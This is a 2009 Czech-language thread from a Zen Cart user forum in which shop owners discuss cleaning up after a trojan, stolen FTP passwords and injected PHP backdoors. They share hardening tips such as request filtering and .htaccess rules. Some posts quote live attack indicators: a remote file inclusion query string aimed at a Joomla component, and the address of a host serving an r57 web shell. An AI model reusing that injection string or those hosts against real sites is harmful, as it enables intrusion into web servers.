Prohlížení tohoto vlákna:
2 Anonymní uživatelé
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Nováček
Členem od:
8:22 16.9.2006 Skupina:
Registrovaní uživatelé Příspěvky:
16
|
Tak jsem to dnes v noci taky čistil - divný kód byl snad ve všech php souborech + scripty spouštějící php soubory v images - vše jsem promazal , změnil hesla , zákazal ukládání hesel v prohlížečích - doufám že to pomůže , přesto to muselo někde zůstat - když si zobrazím zdrojový kód úvodní stránky tak tam je v nezobrazované části asi 50 odkazů na nějaký forex v různých mutacích . Neví někdo zda se dokážou z infikovaných souborů zpátky nakazit i ty vyčištěné ?
Zasláno: 9:00 30.10.2009
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Webmaster
Členem od:
22:00 29.8.2005 Bydliště Brno
Skupina:
Administrátoři Vývojáři Příspěvky:
2124
|
Ahoj, jakmile jednou do stránek měli přístup, tak si mohli udělat někde zadní vrátka ve stylu funkce include pro PHP nebo jiný skript.(iframe) a pak se do stránky dostanou znovu ikdyž změníš hesla a vyčistíš většinu.
Jediná ochrana je přeinstalovat počítač, změnit hesla na ftp i do databáze, celý web nainstalovat znovu načisto. Navíc něco může být v databázi ve které se to těžko hledá. Nicméně je otázka jestli si zadní vrátka dělají, když mají mraky jiných cest. Já jsem osobně jen promazal to co jsem viděl (našel) a změnil hesla na ftp a přeinstaloval PC a zatím klid, což neznamená, že se mě to tam nedostane znovu.
Zasláno: 10:32 30.10.2009
|
|
_________________
Prodej zencart.cz Virtuální sídlo firmy v Brně Pronájem salónku v Brně, oslavy, pronájmy prostor v Brně ----- "Nikdo není dokonalý" .... radím Vám zálohujte |
||
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Guru
Členem od:
12:54 19.9.2006 Bydliště Mikulov
Skupina:
Registrovaní uživatelé Vývojáři Příspěvky:
1419
|
pokud si vytvori nekde skulinku na zadni vratka pres ktere je mozno dostat se zpet tak vas neochrani nic. jen to co pise Kozoroh "udělat vše na novo". další věc je zda server je nastaven tak aby se v rámci serveru nedalo projít na jinou stranu. zjistilo se totiž že u některých serveru a nastavení je možné projít z jednoho na druhý a tím napadnout cokoliv v ramci celeho serveru (není oficialně potvrzeno).
a jaký je výsledek? napadne se web s nejmenší ochranou a pak se to šíří jak lavina po celém serveru.
Zasláno: 11:24 30.10.2009
|
|
_________________
Vývoj software a poradenství, import/export a jiné | Odborné knihy, naučné knihy | Textilní dorty a dárky | vyšívané ozdoby <<než něco uděláš, ZÁLOHUJ E-SHOP !!!>> <<než se zeptáš, projdi si fórum... třeba to už někdo řešil a vyřešil>> |
||
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Guru
Členem od:
16:36 17.1.2009 Skupina:
Registrovaní uživatelé Příspěvky:
157
|
Tak jsem opět narazil na něco - jen zatím nevím co kde hledat a jestli je to opravdu další utok - ale vypada to ze jo - víc na obrázku - nemám s tímhle moc zkušeností, takže pokud je z toho někdo moudrejsi - prosím o radu a názor. Ted jsu stahovat shop na disk a kontrolovat.
edit - tak je to tak - pri zadani tehle adresy : XXXX:// 201.134.249.164/intranet/xpl/cmd/r57 ( místo toho XXXX - je http , ale radeji to nezkousejte - nod me to prerusil ) takze ted jen nevim jestli se pokousel o utok a nebo uz je vevnitr ? Připojit soubor: hack.JPG (0.00 KB)
Zasláno: 16:59 9.11.2009
Editováno Kozoroh ze dne 9. 11. 2009 17:58:03
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Expert
Členem od:
14:19 16.5.2008 Skupina:
Registrovaní uživatelé Příspěvky:
148
|
mne sa predvcerom zasa snazil niekto napchat do url toto:
www .abruzzobooking.it/mambots/test.txt sa tie utoky nejako mnozia... jo a tiez index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/test.txt??
Zasláno: 17:32 9.11.2009
|
|
_________________
www.novynabytok.sk | www.novykoberec.sk | www.novymatrac.sk | www.hezkynabytek.cz | www.hezkykoberec.cz |
||
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Guru
Členem od:
16:36 17.1.2009 Skupina:
Registrovaní uživatelé Příspěvky:
157
|
no dival jsem se a nejsou to zadni amateri,
XXXX://201.134.249.164/intranet/xpl/cmd/ XXXXhttp://201.134.249.164/intranet/xpl/ maji jich tam vic - chtelo by jim to hacknout zatim jsem nic nenasel - bohuzel zatim nevim co vubec hledat a jestli pronikly.
Zasláno: 18:18 9.11.2009
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Expert
Členem od:
16:38 26.8.2007 Bydliště Mělník
Skupina:
Registrovaní uživatelé Příspěvky:
97
|
domnívám se že tohle by mělo řešit viz http://www.zencart.cz/modules/newbb/viewtopic.php?post_id=33924#forumpost33924
část o application_top.php je tam mj odchytávání požadavku GET s dalším "http" v URL Můžete si dopsat i hledání ".txt" v url a posilat 404 nebo 406
Zasláno: 0:21 10.11.2009
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Guru
Členem od:
16:36 17.1.2009 Skupina:
Registrovaní uživatelé Příspěvky:
157
|
Citát:
Našel jsem dva soubory application_top.php patří to do /www/includes/application_top.php nebo do : /www/admin/includes/application_top.php nebo do obou ????????
Zasláno: 19:56 11.11.2009
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Expert
Členem od:
16:38 26.8.2007 Bydliště Mělník
Skupina:
Registrovaní uživatelé Příspěvky:
97
|
určitě do produkčního adresáře.
Ten fragment s voláním http můžete zkusit implementovat i do administračního aplication_top.php, ale není to otestováno. K dalším funkcím v odkazovaném postu - Pro admina platí jiné proměnné, není navíc veřejně dostupný. Pokud ale máte administraci standardně v adresáři "admin", mohou být na něj mířeny útoky, ten doporučuje oficiální podpora ZC přejmenovat (samozřejmostí je úprava adres v konfiguračním souboru admina). Více k bezpečnosti (+patch) viz Gardenovo http://www.zencart.cz/modules/newbb/viewtopic.php?topic_id=4742&forum=1&post_id=32430#forumpost32430 nebo oficiální http://www.zen-cart.com/forum/showthread.php?t=130161
Zasláno: 21:57 11.11.2009
|
|
Přenos |
Re: TROJAN a ukradená hesla FTP |
||
---|---|---|
Guru
Členem od:
16:36 17.1.2009 Skupina:
Registrovaní uživatelé Příspěvky:
157
|
Citát:
Mám ohledně tohodle dotaz , když jsem tohle přidal do .htaccess tak vše fungovalo jak má ( teda pro mě - protože jsem to měl zee své IP, ale po třech dnech bez zakázek jsem se skusil připojit z jiné IP a zjistil že zákazník nemůže vlažit zboží do košíku. Objevovala se chybová hláška o neoprávněném přístupu. ? Nevíte v čem je problém - vám to funguje ???? #RedirectMatch (.*)\.cgi$ http://faked_url_address.php <Limit POST PUT> order deny,allow deny from all Allow from IP_ADMINA Allow from IP_ADMINA Allow from IP_ADMINA Allow from IP_ADMINA </Limit> <Files .htaccess> order allow,deny deny from all </Files>
Zasláno: 12:10 18.11.2009
|
|
Přenos |
Můžete prohlížet témata.
Nemůžete zakládat nová témata.
Nemůžete odpovídat na příspěvky.
Nemůžete editovat Vaše příspěvky.
Nemůžete mazat Vaše příspěvky.
Nemůžete přidávat nové ankety.
Můžete hlasovat v anketách.
Nemůžete připojovat soubory k příspěvkům.
Nemůžete přispívat bez schválení.